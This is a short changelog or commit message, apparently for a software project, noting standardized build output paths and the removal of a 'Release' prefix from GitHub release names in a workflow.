- Standardize output paths for consistent build artifacts
- Remove "Release" prefix from GitHub release names in the workflow